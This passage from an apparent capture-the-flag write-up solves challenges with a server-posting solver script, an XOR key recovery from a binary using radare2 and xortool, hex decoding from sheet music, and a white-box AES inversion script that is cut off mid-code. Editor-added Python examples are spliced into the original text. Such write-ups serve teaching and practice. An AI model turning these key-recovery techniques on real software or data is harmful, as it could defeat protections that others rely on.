submitted = &#x5B;]\n  idx = -1\n  while (len(submitted) &lt; 98):\n    idx += 1\n    for i in range(98):\n      if (idx == i): continue\n      if (hashes&#x5B;i] == hashes&#x5B;idx]):\n        if (i in submitted): continue\n        d = {&#039;first&#039;:str(i+1), &#039;second&#039;:str(idx+1)}\n        print(d)\n        r = s.post(&#039;http:\/\/whale.hacking-lab.com:1111\/solve&#039;, data=d)\n        print(r.text)\n        submitted.append(i)\n        submitted.append(idx)\n<\/pre><\/div>\n<br\/>Now we only need to run the script and wait until 10 rounds are passed:\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\nroot@kali:~\/Documents\/he19\/egg11# .\/solveMemory.py\n{&#039;second&#039;: &#039;1&#039;, &#039;first&#039;: &#039;56&#039;}\nok\n{&#039;second&#039;: &#039;2&#039;, &#039;first&#039;: &#039;81&#039;}\nok\n{&#039;second&#039;: &#039;3&#039;, &#039;first&#039;: &#039;38&#039;}\nok\n...\n{&#039;second&#039;: &#039;82&#039;, &#039;first&#039;: &#039;86&#039;}\nok\n{&#039;second&#039;: &#039;83&#039;, &#039;first&#039;: &#039;98&#039;}\nok\n{&#039;second&#039;: &#039;84&#039;, &#039;first&#039;: &#039;93&#039;}\nnextRound\n{&#039;second&#039;: &#039;1&#039;, &#039;first&#039;: &#039;88&#039;}\nok\n{&#039;second&#039;: &#039;2&#039;, &#039;first&#039;: &#039;5&#039;}\nok\n{&#039;second&#039;: &#039;3&#039;, &#039;first&#039;: &#039;43&#039;}\nok\n...\n{&#039;second&#039;: &#039;55&#039;, &#039;first&#039;: &#039;88&#039;}\nok\n{&#039;second&#039;: &#039;56&#039;, &#039;first&#039;: &#039;77&#039;}\nok\n{&#039;second&#039;: &#039;60&#039;, &#039;first&#039;: &#039;72&#039;}\nok\n{&#039;second&#039;: &#039;61&#039;, &#039;first&#039;: &#039;92&#039;}\nok\n{&#039;second&#039;: &#039;65&#039;, &#039;first&#039;: &#039;84&#039;}\nok\n{&#039;second&#039;: &#039;70&#039;, &#039;first&#039;: &#039;73&#039;}\nok\n{&#039;second&#039;: &#039;76&#039;, &#039;first&#039;: 
&#039;95&#039;}\nok\n{&#039;second&#039;: &#039;78&#039;, &#039;first&#039;: &#039;91&#039;}\nok\n{&#039;second&#039;: &#039;85&#039;, &#039;first&#039;: &#039;94&#039;}\nok, here is your flag: 1-m3m3-4-d4y-k33p5-7h3-d0c70r-4w4y\n\n<\/pre><\/div>\n<br\/>Entering the password <code>1-m3m3-4-d4y-k33p5-7h3-d0c70r-4w4y<\/code> in the Eggo-o-Matic&trade; yields the egg:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/he19_egg11_05.png\" width=\"200\"\/>\n<br\/>\n<br\/>The flag is <span class=\"spanFlag\">he19-jaQ9-0NIr-Ladc-brOT<\/span>.\n<br\/>\n<h1 id=\"chlg12\">12 &#8211; Decrypt0r<\/h1>\nThe challenge provides a 64-bit ELF file called <code>decryptor<\/code> (not stripped and with debug info, which is why the function names below are available):\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\nroot@kali:~\/Documents\/he19\/egg12# file decryptor\ndecryptor: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter \/lib64\/ld-linux-x86-64.so.2, for GNU\/Linux 3.2.0, BuildID&#x5B;sha1]=1835d7dad4e2511aef2328a6fc9a2bb17f36f4e6, with debug_info, not stripped\n\n<\/pre><\/div>\n<br\/>By disassembling the <code>main<\/code> function within <code>r2<\/code> we can see that the program prompts for a password, reads at most 15 characters from <code>stdin<\/code> (<code>fgets<\/code> into a 16-byte buffer, the last byte being the terminating NUL) and passes the buffer returned by <code>hash_unsignedint<\/code> to <code>printf<\/code>:\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\n&#x5B;0x00400580]&gt; pdf @ sym.main\n            ;-- main:\n\/ (fcn) sym.main 86\n|   sym.main ();\n|           ; var int local_20h @ rbp-0x20\n|           ; var int local_14h @ rbp-0x14\n|           ; var int local_10h @ rbp-0x10\n|           ; DATA XREF from entry0 (0x40059d)\n|           0x00400835      55             push rbp\n|           0x00400836      4889e5         mov rbp, rsp\n|           0x00400839      4883ec20       sub rsp, 0x20\n|           0x0040083d      897dec         mov dword 
&#x5B;local_14h], edi\n|           0x00400840      488975e0       mov qword &#x5B;local_20h], rsi\n|           0x00400844      bf14094000     mov edi, str.Enter_Password: ; 0x400914 ; &quot;Enter Password: &quot;\n|           0x00400849      b800000000     mov eax, 0\n|           0x0040084e      e8edfcffff     call sym.imp.printf\n|           0x00400853      488b15560b20.  mov rdx, qword &#x5B;obj.stdin__GLIBC_2.2.5] ; obj.__TMC_END ; &#x5B;0x6013b0:8]=0\n|           0x0040085a      488d45f0       lea rax, qword &#x5B;local_10h]\n|           0x0040085e      be10000000     mov esi, 0x10               ; 16\n|           0x00400863      4889c7         mov rdi, rax\n|           0x00400866      e805fdffff     call sym.imp.fgets\n|           0x0040086b      488d45f0       lea rax, qword &#x5B;local_10h]\n|           0x0040086f      4889c7         mov rdi, rax\n|           0x00400872      e8e0fdffff     call sym.hash_unsignedint\n|           0x00400877      4889c7         mov rdi, rax\n|           0x0040087a      b800000000     mov eax, 0\n|           0x0040087f      e8bcfcffff     call sym.imp.printf\n|           0x00400884      b800000000     mov eax, 0\n|           0x00400889      c9             leave\n\\           0x0040088a      c3             ret\n<\/pre><\/div>\n<br\/>The entered password is passed to the function <code>hash_unsignedint<\/code>, which combines it with a static buffer called <code>data<\/code>:\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; highlight: [35]; title: ; notranslate\" title=\"\">\n&#x5B;0x00400580]&gt; pdf @ sym.hash_unsignedint\n\/ (fcn) sym.hash_unsignedint 478\n|   sym.hash_unsignedint ();\n|           ; var int local_58h @ rbp-0x58\n|           ; var int local_48h @ rbp-0x48\n|           ; var int local_44h @ rbp-0x44\n|           ; var int local_40h @ rbp-0x40\n|           ; var int local_3ch @ rbp-0x3c\n|           ; var int local_38h @ rbp-0x38\n|           ; var int local_34h @ 
rbp-0x34\n|           ; var int local_30h @ rbp-0x30\n|           ; var int local_28h @ rbp-0x28\n|           ; var int local_20h @ rbp-0x20\n|           ; var int local_14h @ rbp-0x14\n|           ; var int local_10h @ rbp-0x10\n|           ; var signed int local_8h @ rbp-0x8\n|           ; var int local_4h @ rbp-0x4\n|           ; CALL XREF from sym.main (0x400872)\n|           0x00400657      55             push rbp\n|           0x00400658      4889e5         mov rbp, rsp\n|           0x0040065b      4883ec60       sub rsp, 0x60               ; &#039;`&#039;\n|           0x0040065f      48897da8       mov qword &#x5B;local_58h], rdi\n|           0x00400663      bf4d030000     mov edi, 0x34d              ; 845\n|           0x00400668      e8f3feffff     call sym.imp.malloc\n|           0x0040066d      488945f0       mov qword &#x5B;local_10h], rax\n|           0x00400671      488b45a8       mov rax, qword &#x5B;local_58h]\n|           0x00400675      4889c7         mov rdi, rax\n|           0x00400678      e8d3feffff     call sym.imp.strlen\n|           0x0040067d      83e801         sub eax, 1\n|           0x00400680      8945ec         mov dword &#x5B;local_14h], eax\n|           0x00400683      488b45f0       mov rax, qword &#x5B;local_10h]\n|           0x00400687      488945e0       mov qword &#x5B;local_20h], rax\n|           0x0040068b      488b45a8       mov rax, qword &#x5B;local_58h]\n|           0x0040068f      488945d8       mov qword &#x5B;local_28h], rax\n|           0x00400693      48c745d06010.  mov qword &#x5B;local_30h], obj.data ; 0x601060 ; &quot;0U\\x1e3\\x18\\x1dTb&lt;\\x01Z\\t\\x16\\x19D\\x01\\x7f\\x0e^\\x01H9\\x01A&quot;\n|           0x0040069b      c745fc000000.  mov dword &#x5B;local_4h], 0\n...\n<\/pre><\/div>\n<br\/>The function allocates an 845-byte output buffer (<code>malloc(0x34d)<\/code>), stores <code>strlen(password) - 1<\/code> (the password length without the trailing newline that <code>fgets<\/code> leaves in the buffer) and sets up pointers to the output buffer, the password and <code>obj.data<\/code> before a loop counter is initialised to zero. After trying different inputs and inspecting the output of the program, I assumed that this might be a simple XOR. 
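As an added example (not part of the original writeup), here are the two things xortool automates, guessing the key length and recovering each key byte, written out by hand in Python. The key is the one recovered further down in this challenge, and the sample plaintext is constructed from the two quotes the decryptor prints; the example encrypts that text itself, so it runs offline. Unlike xortool, which assumes one most-frequent plaintext byte for every column, this version scores all 256 candidates per column against a simple English-likeness heuristic, which is what avoids the two wrong key bytes the tool produces below. The function names and the scoring weights are my own choices.

```python
# Added example, not the challenge author's code: repeating-key XOR broken
# with a coincidence count (key length) and per-column scoring (key bytes).

KEY = b"x0r_w1th_n4nd"  # the 13-byte key from this challenge

# Constructed sample plaintext: the two quotes the decryptor prints.
SAMPLE_PLAINTEXT = (
    b"The XOR operator is extremely common as a component in more complex ciphers. "
    b"By itself, using a constant repeating key, a simple XOR cipher can trivially be "
    b"broken using frequency analysis. If the content of any message can be guessed or "
    b"otherwise known then the key can be revealed. "
    b"An XOR gate circuit can be made from four NAND gates. In fact, both NAND and NOR "
    b'gates are so-called "universal gates" and any logical function can be constructed '
    b"from either NAND logic or NOR logic alone. If the four NAND gates are replaced by "
    b"NOR gates, this results in an XNOR gate, which can be converted to an XOR gate by "
    b"inverting the output or one of the inputs (e.g. with a fifth NOR gate)."
)


def xor_repeating(data: bytes, key: bytes) -> bytes:
    """Repeating-key XOR; encryption and decryption are the same operation."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def coincidence_rate(ct: bytes, lag: int) -> float:
    """Fraction of positions with ct[i] == ct[i + lag]. If lag is the key length
    (or a multiple of it) both bytes were XORed with the same key byte, so the
    rate is that of English text (~0.07); for other lags it is near random."""
    matches = sum(1 for i in range(len(ct) - lag) if ct[i] == ct[i + lag])
    return matches / (len(ct) - lag)


def guess_key_length(ct: bytes, max_len: int = 40) -> int:
    scores = {lag: coincidence_rate(ct, lag) for lag in range(1, max_len + 1)}
    best = max(scores, key=scores.get)
    # Multiples of the real length score just as well, so take the smallest
    # divisor of the best lag whose score is still well above the noise floor.
    for d in range(1, best + 1):
        if best % d == 0 and scores[d] >= 0.5 * scores[best]:
            return d
    return best


def english_score(text: bytes) -> float:
    """Heuristic: spaces and lowercase letters dominate English, control bytes
    almost certainly mean a wrong key byte."""
    score = 0.0
    for b in text:
        if b == 0x20:
            score += 4.0
        elif 0x61 <= b <= 0x7A:
            score += 1.0
        elif 0x41 <= b <= 0x5A:
            score += 0.5
        elif 0x20 < b < 0x7F:
            score += 0.1
        else:
            score -= 20.0
    return score


def recover_key(ct: bytes, key_len: int) -> bytes:
    """Every key byte is a single-byte XOR over its own column: try all 256
    values and keep the one whose decrypted column looks most like English."""
    key = bytearray()
    for col in range(key_len):
        column = ct[col::key_len]
        best = max(range(256), key=lambda k: english_score(bytes(b ^ k for b in column)))
        key.append(best)
    return bytes(key)


def break_repeating_xor(ct: bytes):
    """Returns (key, plaintext) for a ciphertext under an unknown repeating key."""
    key = recover_key(ct, guess_key_length(ct))
    return key, xor_repeating(ct, key)


if __name__ == "__main__":
    ciphertext = xor_repeating(SAMPLE_PLAINTEXT, KEY)
    key, plaintext = break_repeating_xor(ciphertext)
    print(len(key), key, plaintext[:60])
```

The divisor check in guess_key_length is what keeps 26 and 39 from being reported instead of 13, and the heavy penalty for control bytes is what rejects key bytes that are off by a constant. Both heuristics need a few hundred bytes of text to be reliable; on very short ciphertexts the per-column statistics degrade, which is exactly the situation in which xortool also has to fall back to its brute-force modes.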
In order to further analyze the encrypted data with <a href=\"https:\/\/github.com\/hellman\/xortool\" target=\"_new\" rel=\"noopener noreferrer\">xortool<\/a>, we have to extract it first.\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; highlight: [5]; title: ; notranslate\" title=\"\">\n&#x5B;0x00400580]&gt; is~data\n054 ---------- 0x006013ad GLOBAL NOTYPE    0 _edata\n055 0x00001040 0x00601040   WEAK NOTYPE    0 data_start\n067 0x00001040 0x00601040 GLOBAL NOTYPE    0 __data_start\n073 0x00001060 0x00601060 GLOBAL    OBJ  845 data\n\n<\/pre><\/div>\n<br\/>The symbol table lists the encrypted data at file offset <code>0x00001060<\/code> (virtual address <code>0x00601060<\/code>) with a size of <code>845<\/code> bytes. Knowing this we can simply use <code>dd<\/code> to extract it (<code>rax2<\/code> converts the hex offset to the decimal value <code>dd<\/code> expects):\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\nroot@kali:~\/Documents\/he19\/egg12# dd if=decryptor bs=1 skip=$(rax2 0x1060) count=845 of=buff\n845+0 records in\n845+0 records out\n845 bytes copied, 0.0261717 s, 32.3 kB\/s\n\n<\/pre><\/div>\n<br\/>Now we can run <code>xortool<\/code> on the encrypted data:\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; highlight: [7]; title: ; notranslate\" title=\"\">\nroot@kali:~\/Documents\/he19\/egg12# xortool buff\nThe most probable key lengths:\n   1:   10.1%\n   4:   10.6%\n   7:   9.5%\n  10:   9.3%\n  13:   22.9%\n  20:   6.3%\n  26:   12.6%\n  30:   4.4%\n  39:   9.0%\n  52:   5.3%\nKey-length can be 3*n\nKey-length can be 5*n\nMost possible char is needed to guess the key!\n<\/pre><\/div>\n<br\/>The most probable key length is <code>13<\/code>; its multiples 26 and 39 score high as well, which is expected for a repeating key. 
So let&#8217;s brute-force the key with this length (<code>-l 13<\/code>), keeping only the candidates whose plaintext is printable (<code>-o<\/code>):\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\nroot@kali:~\/Documents\/he19\/egg12# xortool -l 13 -o buff\n200 possible key(s) of length 13:\n! b\\x0eg!dxO~$~;\n! b\\x0eg!dxO~$~t\n !c\\x0ff eyN\\x7f%\\x7f:\n !c\\x0ff eyN\\x7f%\\x7fu\n#&quot;`\\x0ce#fzM|&amp;|9\n...\nFound 55 plaintexts with 95.0%+ valid characters\nSee files filename-key.csv, filename-char_used-perc_valid.csv\n<\/pre><\/div>\n<br\/>The results are stored in <code>.\/xortool_out\/<\/code>. Since the plaintext should contain a flag, we grep the candidates for the string <code>he19-<\/code>:\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\nroot@kali:~\/Documents\/he19\/egg12# grep &#039;he19-&#039; xortool_out\/*\nBinary file xortool_out\/188.out matches\nBinary file xortool_out\/189.out matches\n<\/pre><\/div>\n<br\/>Two of the candidate plaintexts contain this string. The file <code>.\/xortool_out\/filename-key.csv<\/code> records which key produced each output:\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\nroot@kali:~\/Documents\/he19\/egg12# cat xortool_out\/filename-key.csv | grep &#039;188\\|189&#039;\nxortool_out\/188.out;10r\\x1ew1th_n4n+\nxortool_out\/189.out;10r\\x1ew1th_n4nd\n<\/pre><\/div>\n<br\/>The second key looks almost right, but it contains a non-printable byte (<code>\\x1e<\/code>). 
Because it is right in front of the word <code>w1th<\/code>, it is probably an underscore, which would make the key:\n<br\/>\n<br\/><code>10r_w1th_n4nd<\/code>\n<br\/>\n<br\/>If we now simply replace the first letter (<code>1<\/code>) with an <code>x<\/code>, the key makes sense:\n<br\/>\n<br\/><code>x0r_w1th_n4nd<\/code>\n<br\/>\n<br\/>Both corrections are the kind of error xortool&#8217;s method produces: it derives each key byte from the most frequent byte in that column (with <code>-o<\/code> it tries every printable character as the assumed most frequent plaintext byte, the same one for all columns), so a column whose most frequent plaintext character deviates from that assumption yields a key byte that is off by a constant; reading the rest of the key as leetspeak fixes the two bad positions.\n<br\/>\n<br\/>Entering this key as the password (the newline appended by <code>echo<\/code> is the byte that <code>strlen - 1<\/code> strips off) successfully decrypts the cipher text:\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\nroot@kali:~\/Documents\/he19\/egg12# echo &quot;x0r_w1th_n4nd&quot; | .\/decryptor\nEnter Password: Hello,\ncongrats you found the hidden flag: he19-Ehvs-yuyJ-3dyS-bN8U.\n\n&#039;The XOR operator is extremely common as a component in more complex ciphers. By itself, using a constant repeating key, a simple XOR cipher can trivially be broken using frequency analysis. If the content of any message can be guessed or otherwise known then the key can be revealed.&#039;\n(https:\/\/en.wikipedia.org\/wiki\/XOR_cipher)\n\n&#039;An XOR gate circuit can be made from four NAND gates. In fact, both NAND and NOR gates are so-called &quot;universal gates&quot; and any logical function can be constructed from either NAND logic or NOR logic alone. If the four NAND gates are replaced by NOR gates, this results in an XNOR gate, which can be converted to an XOR gate by inverting the output or one of the inputs (e.g. with a fifth NOR gate).&#039;\n(https:\/\/en.wikipedia.org\/wiki\/XOR_gate)\n<\/pre><\/div>\n<br\/>The flag is <span class=\"spanFlag\">he19-Ehvs-yuyJ-3dyS-bN8U<\/span>.\n<br\/>\n<h1 id=\"chlg13\">13 &#8211; Symphony in HEX<\/h1>\nThe challenge provides the following sheet of music as well as the hint <i>count quavers, read semibreves<\/i>:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/he19_egg13_01.png\" width=\"800\"\/>\n<br\/>\n<br\/>The hint was very useful. 
We simply have to count the quavers (eighth notes), which gives the hex digits, and read the note names of the semibreves (whole notes), which gives the hex letters A to F:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/he19_egg13_03.png\" width=\"800\"\/>\n<br\/>\n<br\/>This results in the hex stream <code>4841434b5f4d455f414d4144455553<\/code>, which can be converted to the following ASCII characters (Python 2&#8217;s <code>str.decode(&#039;hex&#039;)<\/code>; in Python 3 this is <code>bytes.fromhex(hexstream).decode()<\/code>):\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\nroot@kali:~\/Documents\/he19\/egg13# python\nPython 2.7.16 (default, Apr  6 2019, 01:42:57)\n&#x5B;GCC 8.3.0] on linux2\nType &quot;help&quot;, &quot;copyright&quot;, &quot;credits&quot; or &quot;license&quot; for more information.\n&gt;&gt;&gt; hexstream = &#039;4841434b5f4d455f414d4144455553&#039;\n&gt;&gt;&gt; hexstream.decode(&#039;hex&#039;)\n&#039;HACK_ME_AMADEUS&#039;\n<\/pre><\/div>\n<br\/>\n<br\/>Entering <code>HACK_ME_AMADEUS<\/code> as the password in the Eggo-o-Matic&trade; yields the egg:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/he19_egg13_02.png\" width=\"200\"\/>\n<br\/>\n<br\/>The flag is <span class=\"spanFlag\">he19-7fEm-jj7g-gpt3-4Mdh<\/span>.\n<br\/>\n<h1 id=\"chlg14\">14 &#8211; White Box<\/h1>\nThe challenge provides the following cipher text (64 bytes, i.e. four 16-byte blocks):\n<br\/>\n<br\/><code>9771a6a9aea773a93edc1b9e82b745030b770f8f992d0e45d7404f1d6533f9df348dbccd71034aff88afd188007df4a5c844969584b5ffd6ed2eb92aa419914e<\/code>\n<br\/>\n<br\/>&#8230; as well as the binary which was used to produce the cipher text (stripped this time, unlike <code>decryptor<\/code>):\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\nroot@kali:~\/Documents\/he19\/egg14# file WhiteBox\nWhiteBox: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter \/lib64\/ld-linux-x86-64.so.2, for GNU\/Linux 3.2.0, BuildID&#x5B;sha1]=0077413b3a5ad4d245339f092e46d64e547155f0, stripped\n<\/pre><\/div><div 
class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\nroot@kali:~\/Documents\/he19\/egg14# .\/WhiteBox\nWhiteBox Test\nEnter Message to encrypt: test\n691157323aae599f38afe55d7282a068\n<\/pre><\/div>\n<br\/>Being euphoric that this is a binary challenge I did not pay much attention to the name of it and started to reverse the binary right away. While reversing it, I figured out that this is a <a href=\"http:\/\/www.whiteboxcrypto.com\/\" target=\"_new\" rel=\"noopener noreferrer\">white-box cryptography<\/a> challenge and there are several good resources online about unboxing white-boxes (e.g. <a href=\"https:\/\/www.blackhat.com\/docs\/eu-15\/materials\/eu-15-Sanfelix-Unboxing-The-White-Box-Practical-Attacks-Against-Obfuscated-Ciphers-wp.pdf\" target=\"_new\" rel=\"noopener noreferrer\">blackhat.com<\/a>,  <a href=\"https:\/\/www.youtube.com\/watch?v=84Pp9CBjgd8\" target=\"_new\" rel=\"noopener noreferrer\">LiveOverflow on YouTube<\/a>, &#8230;). There is also a GitHub repository providing <i>various public white-box cryptographic implementations and their practical attacks<\/i>: <a href=\"https:\/\/github.com\/SideChannelMarvels\/Deadpool\" target=\"_new\" rel=\"noopener noreferrer\">SideChannelMarvels\/Deadpool<\/a>.\n<br\/>\n<br\/>Nevertheless I kept analyzing the binary and was confident, that it is possible to reverse the single steps made in order to encrypt the entered plain text.\n<br\/>\n<br\/>For this purpose I mainly used <code>ghidra<\/code>:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/he19_egg14_01.png\" width=\"1200\"\/>\n<br\/>\n<br\/>Actually all steps but one could be reverted easily. 
This single remaining step XORed a value called <code>result<\/code> with values from static data four times in a loop (I named the function <code>encrStack<\/code>, but this was only my personal way to differentiate the functions):\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/he19_egg14_02.png\" width=\"1200\"\/>\n<br\/>\n<br\/>In each of the four iterations a single byte of the (intermediate) plain text is used as an index into the static data and thus selects the 32-bit value that is XORed in; each of the four bytes has its own 256-entry table, chosen by round and column (see the offsets in the script below). So basically the following operation is carried out:\n<br\/>\n<br\/><code>ciphertext_val = static_data[plaintext_byte0] ^ static_data[plaintext_byte1] ^ static_data[plaintext_byte2] ^ static_data[plaintext_byte3]<\/code>\n<br\/>\n<br\/>When reverting this, we know the value of <code>ciphertext_val<\/code>. Since we have access to the whole binary, we also know the values of the <code>static_data<\/code>. In order to deduce <code>plaintext_byte0<\/code> &#8230; <code>plaintext_byte3<\/code>, we can loop through all possible values for the four bytes (2^32 combinations in the worst case) and compare the XORed result. 
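Added example (not the author's script): the same inversion done as a meet-in-the-middle search, which replaces the nested 256^4 loop by two passes over 256^2 pairs. The tables here are randomly generated stand-ins for the binary's static data (the real ones are read from the file in the script below); the function names make_tables, xor4_forward and invert_xor4 are my own. The inversion returns every candidate rather than the first hit, so a non-unique result would be visible. For tables derived from an AES round, where each table is a bijective S-box lookup and the XOR of the four is the invertible MixColumns step, the map from four bytes to the 32-bit word is a bijection and the candidate is unique; with random tables one expects roughly one spurious collision per target, which is why the check asserts membership rather than uniqueness.

```python
# Added example, not part of the original writeup: inverting one
# "XOR of four table lookups" step by meeting in the middle.
import random
from typing import Dict, List, Tuple


def make_tables(seed: int = 1) -> List[List[int]]:
    """Four constructed 256-entry tables of 32-bit words, random stand-ins for
    the binary's static data (assumption: same shape as the real tables)."""
    rng = random.Random(seed)
    return [[rng.getrandbits(32) for _ in range(256)] for _ in range(4)]


def xor4_forward(tables: List[List[int]], b0: int, b1: int, b2: int, b3: int) -> int:
    """The step as found in the binary: every plaintext byte indexes its own
    table and the four looked-up 32-bit words are XORed together."""
    t0, t1, t2, t3 = tables
    return t0[b0] ^ t1[b1] ^ t2[b2] ^ t3[b3]


def invert_xor4(tables: List[List[int]], target: int) -> List[Tuple[int, int, int, int]]:
    """All (b0, b1, b2, b3) with xor4_forward(tables, b0, b1, b2, b3) == target.

    Naive search: 256**4 (about 4.3e9) combinations.  Meet in the middle:
    tabulate t0[a] ^ t1[b] for all 65536 pairs (a, b), then for every pair
    (c, d) look up the left half that completes the XOR.  Cost: two passes of
    65536 steps and one dictionary of 65536 entries.
    """
    t0, t1, t2, t3 = tables
    left: Dict[int, List[Tuple[int, int]]] = {}
    for a in range(256):
        for b in range(256):
            left.setdefault(t0[a] ^ t1[b], []).append((a, b))
    solutions: List[Tuple[int, int, int, int]] = []
    for c in range(256):
        for d in range(256):
            need = target ^ t2[c] ^ t3[d]  # t0[a] ^ t1[b] must equal this
            for a, b in left.get(need, ()):
                solutions.append((a, b, c, d))
    return solutions


if __name__ == "__main__":
    tables = make_tables()
    secret = (0x43, 0x6F, 0x6E, 0x67)  # "Cong", the start of this challenge's plaintext
    word = xor4_forward(tables, *secret)
    candidates = invert_xor4(tables, word)
    print(len(candidates), "candidate(s); original among them:", secret in candidates)
```

For a full block the same lookup is done once per column and round, so the dictionary can be built once per (round, column) and reused for every target word; the page's script instead rebuilds its four value lists on every call and then searches them with four nested loops.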
My first concern was that more than one combination might produce a valid result, but it turned out that there is only ever a single valid one (possibly an inherent property of the tables of an AES white-box, but I did not dig deeper into this).\n<br\/>\n<br\/>In the end I wrote the following Python 2 script, which decrypts 16 bytes at a time (it reads the lookup tables straight from the <code>WhiteBox<\/code> binary at fixed file offsets, which relies on Python 2 string semantics):\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: python; title: ; notranslate\" title=\"\">\n#!\/usr\/bin\/env python\n\nimport sys\nimport struct\n\nbinary = open(&#039;WhiteBox&#039;, &#039;r&#039;).read()\n\ndef decrShuffleNewOrig(r):\n  ret = &#x5B;None]*16\n  for i in range(4):\n    for j in range(4):\n      ret&#x5B;i*4+j] = r&#x5B;i+j*4]\n  return &#039;&#039;.join(ret)\n\ndef decrChooseFromDAT(r):\n  ret = &#039;&#039;\n  for i in range(16):\n    findByte = r&#x5B;i]\n    for j in range(0x100):\n      if (binary&#x5B;0x2060+i*0x100+j] == findByte):\n        ret += chr(j)\n        break\n  return ret\n\ndef decrShuffleBlocks(r):\n  ret = &#x5B;None]*16\n  ret&#x5B;0xf] = r&#x5B;0xc]; ret&#x5B;0xe] = r&#x5B;0xf]\n  ret&#x5B;0xd] = r&#x5B;0xe]; ret&#x5B;0xc] = r&#x5B;0xd]; ret&#x5B;0xb] = r&#x5B;9]; ret&#x5B;0xa] = r&#x5B;8]\n  ret&#x5B;9] = r&#x5B;0xb]; ret&#x5B;8] = r&#x5B;10]; ret&#x5B;7] = r&#x5B;6]; ret&#x5B;6] = r&#x5B;5]; ret&#x5B;5] = r&#x5B;4]\n  ret&#x5B;4] = r&#x5B;7]; ret&#x5B;3] = r&#x5B;3]; ret&#x5B;2] = r&#x5B;2]; ret&#x5B;1] = r&#x5B;1]; ret&#x5B;0] = r&#x5B;0]\n  return &#039;&#039;.join(ret)\n\ndef findXorValues(x,i,v):\n  # eg. 
0x19a08d51 = 0xdb273160 ^ 0x9e2d7eaf ^ 0xf7c0787 ^ 0x53d6c519\n  vals1 = &#x5B;];  vals2 = &#x5B;]; vals3 = &#x5B;]; vals4 = &#x5B;]\n  for v1 in range(256): vals1.append(struct.unpack(&#039;&lt;I&#039;, binary&#x5B;0x3060+(v1+(i+(x*4+0)*4)*0x100)*4:0x3060+(v1+(i+(x*4+0)*4)*0x100)*4+4])&#x5B;0])\n  for v2 in range(256): vals2.append(struct.unpack(&#039;&lt;I&#039;, binary&#x5B;0x3060+(v2+(i+(x*4+1)*4)*0x100)*4:0x3060+(v2+(i+(x*4+1)*4)*0x100)*4+4])&#x5B;0])\n  for v3 in range(256): vals3.append(struct.unpack(&#039;&lt;I&#039;, binary&#x5B;0x3060+(v3+(i+(x*4+2)*4)*0x100)*4:0x3060+(v3+(i+(x*4+2)*4)*0x100)*4+4])&#x5B;0])\n  for v4 in range(256): vals4.append(struct.unpack(&#039;&lt;I&#039;, binary&#x5B;0x3060+(v4+(i+(x*4+3)*4)*0x100)*4:0x3060+(v4+(i+(x*4+3)*4)*0x100)*4+4])&#x5B;0])\n\n  for v1 in range(len(vals1)):\n    for v2 in range(len(vals2)):\n      for v3 in range(len(vals3)):\n        for v4 in range(len(vals4)):\n          if (vals1&#x5B;v1]^vals2&#x5B;v2]^vals3&#x5B;v3]^vals4&#x5B;v4] == v):\n            return chr(v1)+chr(v2)+chr(v3)+chr(v4)\n  raise Exception(&#039;did not find solution&#039;)\n\n\ndef decrStack(x,r):\n  v1 = findXorValues(x,0,struct.unpack(&#039;&lt;I&#039;, r&#x5B;0]+r&#x5B;4]+r&#x5B;8]+r&#x5B;0xc])&#x5B;0])\n  v2 = findXorValues(x,1,struct.unpack(&#039;&lt;I&#039;, r&#x5B;1]+r&#x5B;5]+r&#x5B;9]+r&#x5B;0xd])&#x5B;0])\n  v3 = findXorValues(x,2,struct.unpack(&#039;&lt;I&#039;, r&#x5B;2]+r&#x5B;6]+r&#x5B;0xa]+r&#x5B;0xe])&#x5B;0])\n  v4 = findXorValues(x,3,struct.unpack(&#039;&lt;I&#039;, r&#x5B;3]+r&#x5B;7]+r&#x5B;0xb]+r&#x5B;0xf])&#x5B;0])\n  final = &#039;&#039;\n  for i in range(4): final += v1&#x5B;i]+v2&#x5B;i]+v3&#x5B;i]+v4&#x5B;i]\n  return final\n\n\ndef decrIdxShuffle(r):\n  return 